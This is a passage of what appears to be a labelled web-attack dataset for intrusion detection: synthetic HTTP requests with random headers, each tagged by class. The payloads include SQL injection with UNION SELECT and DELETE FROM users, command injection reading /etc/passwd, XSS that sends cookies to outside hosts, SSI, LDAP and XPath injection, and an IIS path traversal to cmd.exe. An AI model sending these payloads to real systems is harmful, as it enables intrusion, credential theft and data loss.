Referer: http://www.oiiaI.cz/cosIr/Duatn/erqIdgds/rsWl.mspx
TE: gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.4 (Windows; U; Win 9x 2.7; t9-a8; rv:0.8.4) Gecko/44562095
UA-CPU: Sparc
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 347x3393
Via: Ais/6.2 55.196.188.47, 2.1 88.186.140.32
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 525 www.rlfhnaia.jpeg "eIsh3fim5tmHdpgm5ei" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 159927284892004319
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47009
Start - Id: 36686
class: OsCommanding
GET /7fwe/rznrtofTaeno.jpeg?ro=rotc HTTP/1.1
Host: 31.232.210.209
Connection: keep-alive
Accept: text/*
Accept-Charset: us-ascii, hz-gb-2312;q=0.2
Accept-Encoding: deflate;q=0.6, compress, compress;q=0.6
Accept-Language: Sn-lm, Peegen1s-saiwyeri
Cache-Control: max-stale=96903
Client-ip: 57.185.215.69
Cookie: ecHbt=cat     /etc/passwd|
Date: Fri, 11 Jul 08 16:06:58 GMT
ETag: "7i8Ocp.l-xLKPWS4"
From: esepusj@spzi2ttr.net
If-Unmodified-Since: Sun, 08 Mar 09 10:48:07 CET
If-Match: "4cm6Dn5QO@OyXVOGZxHX"
If-Range: *
Max-Forwards: 5463
Pragma: puiesoi=mf
Authorization: Digest opaque="4Soe8sgg"
Referer: /aiur/rn7N/9mN5u9r0/dyEb.png
TE: trailers,chunked
User-Agent: Mozilla/0.2 (Windows; U; WinNT 6.8; iA-qT; rv:5.7.2) Gecko/75297362
UA-OS: WinNT
UA-Color: color32
Via: 7.5 www.nHnolasd.png:96, 0.3 www.ottoed.shtml, HTTP/5.6 www.heshFry.js
Transfer-Encoding: deflate
Warning: 538 71.245.54.93 "h7D2" "Wed, 07 Nov 07 23:06:34 GMT"
----: ----------------------------------------------

null

End - Id: 36686
Start - Id: 36653
class: OsCommanding
GET /nh5e/sOCJ@qcKqoTor/n6BnmnMhs5zbzPY/ohqeeieFDHn/REjaetn/aezHrdtw5elsommm/ehu5uEstemhn4Ha/a5hef2tZ0hw/axdJ/Ki0nl2otddyfio3.jpeg?bAodclrpshmhfh=iuirq4tsi&umban6oyf=iris&e3ouwre4i6eme=%7Eg+m&cubfromVU-Zpassthrus6=%7C++++dir+++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C%2C HTTP/1.1
Host: 228.72.246.23
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: aR-TeeOeu, hudxooe-u7Jod, to0-4rSo
Cache-Control: max-stale
Client-ip: 237.53.232.194
Cookie: tctfnypcjgre=5378091;laeAerfdpiohl=rh
Date: Fri, 15 May 09 14:55:12 GMT
Expect: foAfel
From: zeiTo@a5ng.biz
If-Modified-Since: Sun, 25 Dec 05 01:41:44 UTC
If-Unmodified-Since: Mon, 29 May 06 12:21:58 CET
If-Match: *
If-None-Match: "2cdUO98hyQW3@xV"
If-Range: Sun, 01 Mar 09 09:29:57 GMT
Max-Forwards: 5
MIME-Version: 8.5
Authorization: knwa2 hhrais7=2pEA
Referer: /4or4brwy/eurueee9/rtia.pdf
TE: deflate;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 6.3; nu-8W; rv:4.3.5) Gecko/59292113
UA-CPU: Sparc
UA-OS: Linux
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: gzip
Upgrade: nrtus/2.2, ncogn/8.3, yti/9.0
X-Forwarded-For: 193.167.35.201
X-Serial-Number: 96597
----: -----------------

null

End - Id: 36653
Start - Id: 41533
class: SqlInjection
PUT /iF/eu7cSnkzymeaenotaeao/dXvl/a..J9lc.Ku/wteYnrbHspNeone/_LDW.jpeg? HTTP/1.1
Content-Length: 299
Content-Language: igix,mnihprds,2osr
Content-Encoding: identity
Content-Location: http://www.ayIqywi.gov/Ttezs/viop/NZe4Yno.jpg
Content-MD5: OGhuZzVENE5SYW9ubm9Scg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jul 04 08:26:51 UTC
Last-Modified: Thu, 12 Jun 08 08:40:27 GMT
Host: www.tirrsvmteA.de
Connection: eiiylor
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale=2105
Client-ip: 124.86.136.28
Cookie: rcrgE9194i=9807713;rys02iwX=lulri3nrh48
Cookie2: $Version="111"
Date: Tue, 05 Jan 10 07:41:13 GMT
ETag: W/"PqTaCJxgsAvQFa_UT"
If-Unmodified-Since: Sun, 21 Dec 08 07:52:55 GMT
If-Match: *
If-None-Match: "ggPdVKhnRtvW-l33-1v2"
Max-Forwards: 9230
Authorization: NTLM c3FvcmRmZWljb3ltZUF4VGF1bWloc2lkaG9OaG50bWhl
Referer: http://www.yhbe.fr/ltnloyN/s7niten/vwsci/tegUfcj/ueacare.sh
TE: trailers,deflate,trailers
User-Agent: Mozilla/2.4 (Windows; U; WinNT 4.6; bl-Or; rv:3.9.0) Gecko/02722040
Via: 1.9 www.opea.tiff
Transfer-Encoding: deflate
Upgrade: ied/4.5, ed6tn/2.3, fotom/3.2, ooni/6.1, hhIt/6.5

eepsree5pjedao=htv1snhr&uhwi9ee=6&orwdt=cBLyNt-.iLC1&7ruosyeti=tkbf7Yt&aiY3nenNdn=eENnfA&XIadminaRPSzihttp=') UNION    ALL   SELECT  57   FROM NzaTdtoo    WHERE (  '' =   '&ea6xoaoEefoagwe=527852&3roraats=896&beev=fslz&1mt5n=4154&qiHdaq=0Onull&detmOatjoe=nlmdt&7eisfx=h0q&T1C.6andI=948

End - Id: 41533
Start - Id: 42302
class: SqlInjection
GET /idi8rj6Yeaso/aOhrefSqdoniIf/trkvE3eyshr6eiinrso/1.X3fKP8/rc.TeJVNy3HEXCoH25/lrenloigeeeoejaxkjw.asmx?6oxnc5uii0i=l3t&labwdnejdpe2n=rOaHr4tessog4mnsoo&etf1aIsml=mVTt_sN&acceptm_eJ2V=tS&cFcopyACuxScat=wiolopentnme+6sm&horriy=gtnhOiwstedllo&mCyatrburd7=iaaihyraelioE&fq=%27%3B++++insert+into+++++aa6sx3t++values%28666%2C%27etlDct%27%2C%27Br9x6%27%2C0xfffff%29&HD=Asm4rtdgiNtn HTTP/1.0
Host: www.keos8haom.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 43.137.232.139
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="5"
Date: Tue, 21 Oct 08 04:25:22 GMT
ETag: W/"17F1n2q6q2So7mxf"
Expect: 2bjxcs=wsw3;ntaora=E4Oor
From: ebsew@sn8ns6e.de
If-Modified-Since: Sat, 29 Nov 08 11:41:34 CET
If-Unmodified-Since: Sun, 04 Nov 07 22:26:31 CET
If-Match: "8JlEr62zHYDWkaSw"
If-None-Match: *
If-Range: Mon, 11 Dec 06 23:14:20 CET
Max-Forwards: 33
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: b2tam rguj=eenzIhf
Authorization: Basic Z3JsczRhOm9udHpwYWQ=
Range: -568889,-588214
Referer: http://www.ymhlirrU.gov/Ntrtbrys.msf
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.6 (compatible; MSIE 6.4; Solaris; 63haEw6dar; rmstodq9dr; isugLutFk)
UA-CPU: Sparc
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: 8.9 www.sdre.tiff, FTP/5.4 www.6e7ilX4i.jpg
Transfer-Encoding: compress
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 74.6.222.203
X-Serial-Number: 807714416153290560
----: -------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42302
Start - Id: 47523
class: XSS
GET /0mtx7/ahhhhyTlmD.pl?ueie7eczwoee=998&gaits=3&dgoLt=3&uleos1utiCayOe=%26%7B%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.antori.com%2Fcgi-bin%2Fse.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&l7IHYMscriptobjecteval=2MSd&afNZautoexecEw=e8ptauocref4odigL&6oas5Enaeieog=3012&Pprocessing-instructionzy-cCt=hH0FIBJr7T&pAarsij=oACAcl0HM HTTP/1.0
Host: www.ye0iEnb.de:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-8-i, euc-kr, koi8, windows-1252;q=0.9
Accept-Encoding: gzip, gzip;q=0.1
Accept-Language: stiefc-qaeh;q=0.4, s-lomeuudm;q=0.1, qb-pr
Cache-Control: no-cache
Client-ip: 2.40.61.206
Cookie: _b@jplocation4Ob=88ioRitbodynetcatr$9h&)htpasst|Eh;ZcopyJngroup byZUznoND=eeteysmt0lsBl;Idpln9nnhDn6gm2=<hstm1ocir;d9ctsddawau=npt@to  r/9(1passthruiselect 
Cookie2: $Version="545"
Date: Tue, 22 May 07 18:50:27 GMT
ETag: "EaAlK23iso.d7ql"
Expect: mAnknsm
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 23 Feb 06 15:12:57 GMT
If-Unmodified-Since: Tue, 29 Jun 04 01:02:15 GMT
If-Match: "dtqnudCUsA2gz2UaCd"
If-None-Match: *
If-Range: "JVDYvwnAFWffRMm"
Max-Forwards: 822
MIME-Version: 0.2
Pragma: erlhSon='au'
Proxy-Authorization: Basic RWhzaWU6b05ub2U=
Authorization: NTLM dktmdHRSaXl1OGNtaWF0bGV0Z0Fzc3hvcm9SdXc5T3Q=
Range: 22-,852303-,3-
Referer: http://ode2o.uk/o15tahr/nege.msf
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: Mozilla/1.7 (X11; U; Solaris 5.0; s7-sn; rv:9.4.7) Gecko/25693941
UA-CPU: PowerPC
UA-Disp: 0811,223,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: 9.2 www.i1le2l.htm
Transfer-Encoding: deflate
Upgrade: atsa/8.3
Warning: 781 255.112.125.38 "ehmjCimcbjUud9qrtdru" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47523
Start - Id: 44644
class: PathTransversal
GET /ob1Dw91mCWRFBw3a37z/geEhann4hieop/KF/iXApxT32ees6RKqCQ/noNaiTZ9En6.MW8/euctyeoN8saooiakol8/ftL/eg2PuvCMl.0oA4T0W/nefpclTHa3aerspne/lPJ9.VI3SKpA/tre3qomtrh.bin? HTTP/1.1
Host: www.attiro1s.com
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Date: Thu, 14 Jun 07 02:07:41 UTC
ETag: W/"_VFS2wW67gDZE-6or_"
If-None-Match: *
If-Range: Sat, 25 Oct 08 07:25:58 GMT
Max-Forwards: 2
Pragma: no-cache
Proxy-Authorization: cneski uhtR=teim
Referer: /u9itRv/ywwhesoi/snrto.wav
Trailer: Cache-Control
User-Agent: /./../../.././../.././../.././../../../
UA-Disp: 099,001,16

null

End - Id: 44644
Start - Id: 37680
class: LdapInjection
POST /kx/5y7SqjRgpIXraW4sZ_/ttdziane7jrXs/ajer7aOIawrilS3tiede/maotjoy9ynih/ihsmxeparlb/lWPhWVn2uL5@L2TuRob/t_dGTZ4XA/oottoehmcloLee/scljOMow_NRNGPW/4hGsf_/Ite.nsf? HTTP/1.0
Content-Length: 79
Content-Language: ekneMe,t2tooN,c
Content-Encoding: deflate
Content-Location: /bRsiixl4.png
Content-MD5: c3RzM2lzenJ1c25tbHM2dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 May 10 12:21:03 UTC
Last-Modified: Mon, 07 Apr 08 03:12:16 UTC
Host: www.fonuR.de
Connection: ahin
Accept: */*
Accept-Charset: iso-8859-8
Accept-Encoding: 
Accept-Language: eeyj-fisqr, tkuo-agliM, Ogrer-msIt;q=0.3, eocBb-tahoo, nlpNti0-emi;q=0.6
Cache-Control: Rx4ote='vg'
Client-ip: 71.214.180.23
Cookie: ltiocsE5eoCnvt=uoEz6qe
Cookie2: $Version="482"
Date: Fri, 27 Oct 06 13:12:20 CET
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: ssDeu@yeiMt.st
If-Modified-Since: Thu, 29 Jan 04 11:58:59 CET
If-Unmodified-Since: Wed, 07 Feb 07 15:33:10 UTC
If-Match: "d_JYcP50@@aMHpK1nS2"
If-None-Match: "IdlzY8n0RpYMhQ8F7"
If-Range: Fri, 18 Mar 05 20:29:55 CET
Max-Forwards: 1
MIME-Version: 8.1
Pragma: ehne7='y8ixje'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: artndN iein9svf=ysroleo
Range: 6058-6,88-,-245437
Referer: /aTdsae/wafa/i3doSri.tiff
TE: trailers
Trailer: Authorization
User-Agent: f2hbSTH http://www.nuico.net
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 6.1 www.hkime.tiff:2926
Transfer-Encoding: deflate
Upgrade: utq/9.8, iht/9.3, asta/6.4, eTsoh/3.0, seh/3.0
Warning: 638 www.testaoOo.shtml "I7qnrs9jyxsxit2" 
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iiscyins=) ( | (cn=*o   'brien*    )(mail=*o 'brien*   ) 

End - Id: 37680
Start - Id: 37562
class: LdapInjection
PUT /Lh2l9/oehcl/bbehZ1GI-sqEylpiAzBR/eOK-2qt51kw-Dk3lr/9q5Sf8YE9y/MBV5bB.kus.jsp? HTTP/1.1
Content-Length: 125
Content-Language: ebs,ohIe,jpm
Content-Encoding: identity
Content-Location: http://www.tlgnfa.gov/ifek/Ricwhrao/UPeobh.txt
Content-MD5: b3Rrb2JvZFJtYXlvZmlhNA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Mar 04 11:03:05 GMT
Last-Modified: Sun, 03 Jun 07 03:02:09 CET
Host: 176.9.64.226
Connection: ha9ai1m
Accept: */*;q=0.7
Accept-Charset: iso-8859-6, x-mac-icelandic, shift_jis;q=0.1, x-mac-ce, isiri-3342
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 229.190.23.163
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="86"
Date: Mon, 09 Feb 09 07:21:09 CET
ETag: W/"enilrOj7ei_-Z4H8rKq"
Expect: liIlS
From: oenu@5hnawusete.de
If-Modified-Since: Thu, 14 Jan 10 05:27:36 UTC
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Mon, 16 May 05 05:58:40 GMT
Max-Forwards: 0
MIME-Version: 9.9
Pragma: sh6h5t='haceYer'
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: NTLM aWVubmxHb3JldmZSZ2lsMWlhTmhDbHNxaGk3ZGhhb0R1b2lvTDh4dnNjTk1lWW90
Range: -78728,9752-,0169-21
Referer: /sunRidga/trerp/6ttonln/nsdoee/adfuioj.nsf
TE: deflate,chunked;q=0.5,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 7.0; Te-oH; rv:2.2.8) Gecko/34444119
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1680x065
Via: 6.5 www.uf7ept5.jpeg, eAsedr/7.2 www.9ttm.css
Transfer-Encoding: compress
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rqOxrdi=duWOQ&wCbtdmemihiIeu=7&mmgHlzPeNeyc=48)(&(objectClass=m0s)(|(sn    =    t2n)(cn=hW J*))

End - Id: 37562
Start - Id: 42676
class: SqlInjection
GET /aU1Hloiwp-5G/0Mmv/tfpOJ5/htdc0bmpsaFld/ectTUsrd/u0/f4zO-vincluderimgHxtermlibQL/eeyschh4/ktn2a5m3wHse8nGt/d7onpc_/qY4.htm?etoitiiorp=0h&eaeigpxgfu=surzholwonh7aeltfA&jr7se=sTsnti%27+++%29%3BDELETEFROMusersWHEREupper%28username%29+%3D++++upper%28++++%27admin&ahtNseedc=o7%2Bsmn HTTP/1.0
Host: www.eGer9.com
Connection: 6ehi
Accept: image/gif;q=0.8, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Date: Mon, 27 Nov 06 05:08:39 UTC
ETag: W/"O4511sH@af4c9fN"
If-Match: "-Y5v6wCT5fsai9OsA_7"
If-None-Match: *
If-Range: "yHAUYlYXVqZwr_ORZHO"
Max-Forwards: 34
Pragma: no-cache
Range: 1-0,751199-8
Referer: http://www.2gr8.cz/9ieeeaco/gdoaaeHa/si9nvH.pdf
TE: deflate;q=0.9,trailers
User-Agent: Mozilla/8.6 (compatible; MSIE 6.7; WinNT; Zilm)
Transfer-Encoding: identity
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42676
Start - Id: 38579
class: LdapInjection
GET /bT/azin/oiitsnjmztaee/48gurAOX-C6jc8sy/XrHiaw/x6osrplehhnWrae1c8p/Mtmpee4l1oieirthhaeo/uEY5eAXP-Y9t/2TdF2UCup1s1wqhm/tLiXVhZQvchh/selectVhtt.sYW/hE9yeohtais.htm?ontFn=yS.9FwOg1l&pudgwnld3epvn=xp_a7&BUKdrop@MRkS6qO=%29+%28+%7C%28cn%3D*o+++%27brien*+%29%28mail++%3D*o+%27brien*+++%29+&aiVu7GpFHjc=12218664&hojtnlwnNoot=Pk&between.mbqac=y&4M=wez1W%40Uu&eq0uevst3h7=oVQb HTTP/1.0
Host: 130.196.197.128
Connection: xh2sn
Accept: */*;q=0.8
Accept-Charset: iso-8859-6;q=0.6, big5;q=0.2
Accept-Encoding: compress, identity, compress;q=0.1, identity, gzip
Accept-Language: tpW-q;q=0.7, g-4hUe
Cache-Control: j8ngia9Z='gea7isar'
Client-ip: 231.216.109.79
Cookie: ln=uIeodtcaoD1matee;ohttpopen4FXVCoptqboot.iniE=3284;UQtL4qPUUzo=5;2rYn=1n99steneayel;13ZpM=i4J;Hnce2ia2uti=nin
Cookie2: $Version="987"
Date: Tue, 20 Jan 09 01:50:28 GMT
ETag: W/"INs.rY_u52VqhZ3fN"
Expect: UpT3s
From: sntdhp@rvsirrEwfi.it
If-Modified-Since: Thu, 04 Mar 10 03:22:05 UTC
If-Unmodified-Since: Sat, 03 Apr 10 02:00:47 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 20:22:44 UTC
Max-Forwards: 88
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nc=862e2FDb
Authorization: Digest realm
Range: -5
Referer: /amtr/rl3g/oLbM/tnysah/d5eeap.php4
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.9 (X11; U; Open BSD i586 8.6; 2B-ur; rv:3.2.7) Gecko/43571420
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 639x8095
Via: FTP/6.1 112.195.132.111:64659
Transfer-Encoding: gzip
Upgrade: ksu/7.2, ear/3.1
Warning: 767 180.228.227.71 "tniR" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38579
Start - Id: 47565
class: XSS
GET /rIja9OjMrGtv6Cg-GAZ/arwb4/PYLRxtr/.qaJinSJziframe@/4ecaizshtam/naf/ejAjY2e.html?snioD1otIte8xe=bB3.v&Ahliena8ec4e=evF3Oq-C&uerOe9ad=sdt0a%24esaecoidcsbSla&ce=5974583449&aetnrjaeqop=+%5D1a&asnrdossp=%3Ca+href++++%3D+++%22++javas%26%2399%3Bript%26%2335%3B%5Bwindow.open%28%27http%3A%2F%2F27.225.58.173%2Fra.bin%27%2Bdocument.cookie%29%3B%5D%22+%3E&hi=aerslscriptoxwREjhome&5emnfAstisrs=8SE-jKK&soceteo3aent=eeinzlmlstfe3etcV&0WJ_@=%24&istHgm1a2s=ogexece%2Bahrtrou+&lylpldhcdcotaw=a8Raf%40w%40&i3Ieopneinl7=pyP8bPBsQbnd&ftsrAca1qhir7dy=2 HTTP/1.0
Host: www.idoXcjD.st
Connection: close
Accept: image/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 0-aa, pTmeode-a, jssieh3-leidwFzc, s-t;q=0.4
Cache-Control: max-stale
Client-ip: 179.102.117.111
Cookie: tiwuamlnale=ytee/u;9l=s4cwXy;alretmtcsTg=cElboot.ini;Sip=0
Cookie2: $Version="47"
Date: Thu, 11 Oct 07 11:24:45 GMT
ETag: W/"U8aHqItHXJkmtXoCz4YF"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Sun, 02 Nov 08 16:41:41 CET
If-Unmodified-Since: Sat, 20 Feb 10 13:04:04 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 23 May 07 03:52:07 CET
Max-Forwards: 8403
MIME-Version: 3.2
Pragma: de3fmbd=ls
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: Digest realm
Range: 946-214738,54330-8
Referer: /ms2mon/R99br/eymhql.msf
TE: gzip,gzip;q=0.7
Trailer: Accept-Language
User-Agent: 1Io6ri (l2eVw9U; sINueB)
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 684x889
Via: FTP/3.8 www.adnn.html:386, 3.6 186.155.87.58, cDeH/9.9 74.177.179.0
Transfer-Encoding: deflate
Upgrade: nqne/3.2
Warning: 080 16.181.246.224 "nOai1ghriikwtss" "Mon, 29 Aug 05 07:48:25 UTC"
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47565
Start - Id: 39801
class: SSI
GET /nb20s9ampcuo24aac.jpg?wnd02=888267&4CMUVBxPhttp2=noH%3Eefksnek8hds&tmwNrT=%3C%21--+%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&esxersrtflg=ahp1DYejy&cTom3wlnft=39&dqwsi9ar1=dRh_AGNA7T&vftprm9hhf4.y=268885&NRNSkNlRJJf=Emlec0Oir HTTP/1.1
Host: www.ron0lEareo.fr:80
Connection: aaens1
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 252.98.95.119
Cookie: racRda5wruslh=a?g;oeermit=taQnih5e5tpc;nje=iaene2d;hrPvt5lhi9=QnZhS0
Cookie2: $Version="9"
Date: Tue, 22 Feb 05 23:30:27 GMT
ETag: "q3Fsno.d.@JmHDHi"
Expect: omeToflz=ztetlio;erobtb
From: IninTta@sey4cto.cz
If-Modified-Since: Mon, 25 Aug 08 22:09:53 GMT
If-Unmodified-Since: Thu, 06 Nov 08 06:28:18 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: Sun, 23 Oct 05 10:53:14 GMT
Max-Forwards: 0
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: NTLM MVBlYWVSZXNhZXRlbnVlbGluRWhlam9iZWFuMGVzb2Vhek5zMw==
Range: 2975-
Referer: /rhotpn/hmelab/frn7jrf.ace
TE: trailers,gzip,trailers
Trailer: Trailer
User-Agent: d8mOe9 (tDy-VKkQs; pXZoM6S@X; fMeDCRuCc5; nudvMGlb-)
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: HTTP/6.3 www.tiCo8.jpg, apsspd/3.6 230.233.79.136, 0.6 99.76.109.82
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39801
Start - Id: 48320
class: XPathInjection
GET /9Laccess_logpgrL2Achildmd/mn/ywe_GYhN_tWC8DJtB/titGNoPn.rjMxkB/yXBAqEitm1.jpg?e7mNlye=hidnav&weaeEsRz=05657&m4go9fed=zzena&ea5deoe2io=2io2anuoT&@kNzy=%3FedivD8iv&osio8cn=Jnpasswd0+- HTTP/1.1
Host: www.eeerodioil.ch:80
Connection: close
Accept: application/*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: nereo-ge;q=0.0, ohxbUY-p;q=0.9, st-e, bsmsd-a, ytcBndh-A;q=0.5
Cache-Control: no-cache
Client-ip: 137.170.35.34
Cookie: 5gthm5otAtrusy7=nrnda6iog5eAn3p;xstnMcir1u=3sbaa7stcar2ci;lsrarai6cupas=nRlo;X-vPhtpassvHhwynz=Sjh;ess=5629128
Cookie2: $Version="9"
Date: Fri, 17 Jul 09 07:14:21 GMT
ETag: W/"6UUI1@JW63a.jma2f1"
Expect: preieae1=rrnnt7r
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Sun, 27 Jul 08 10:17:29 CET
If-Unmodified-Since: Thu, 10 Apr 08 12:07:25 UTC
If-Match: "5@lit5Gf6gB8ypW"
If-None-Match: *
If-Range: "od@Rp-TXux0Nbrg"
Max-Forwards: 025
MIME-Version: 6.0
Pragma: t='ety'
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: ro2Xo ulta=pOrntd6
Range: 25-46045
Referer: /94ydS/dhdaaNma.swf
TE: trailers,chunked;q=0.9
Trailer: If-Modified-Since
User-Agent: Rhwc'   or  ex/aahha/child::node()[processing-instruction()=2]   or 'orer' = '
UA-Disp: 296,6544,16
UA-Color: color8
UA-Pixels: 433x249
Via: 0.5 www.onileto.jpg, pmwshi/7.2 21.94.135.100:329, 6.9 www.rdtwirs.html
Transfer-Encoding: esbrg
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 545 www.lmrboeu.jpeg "maAlRieci" "Mon, 07 Mar 05 16:38:52 UTC"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48320
Start - Id: 44011
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 208.77.30.5
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic, ks_c_5601-1987, utf-8, ks_c_5601-1987, iso-8859-7;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 17.39.141.125
Cookie: oh5l3Sewh=w5eeC9mbmx;t4ucnttat=44670420;thndnsh=Rgi;dtngiSie3ekCsee=aie;imiw=7385380
Cookie2: $Version="1"
Date: Sat, 08 May 04 12:05:23 GMT
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Thu, 24 Aug 06 14:32:19 GMT
If-Unmodified-Since: Wed, 05 Dec 07 21:48:32 CET
If-Match: "@Ks4l7ofmyY2aScABGMH"
If-None-Match: *
If-Range: *
Max-Forwards: 484
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: ivn1d wIdh9ti=ee5z
Range: 67-764741,470518-20,3-202913
Referer: /anSwfn.js
TE: chunked;q=0.4,gzip;q=0.2,trailers
Trailer: Host
User-Agent: elebEalo (uDcO5tzX; apWF8Sk; c_vCACv46K)
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: identity
Upgrade: eeek/4.8, annk1/4.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44011
Start - Id: 48411
class: XPathInjection
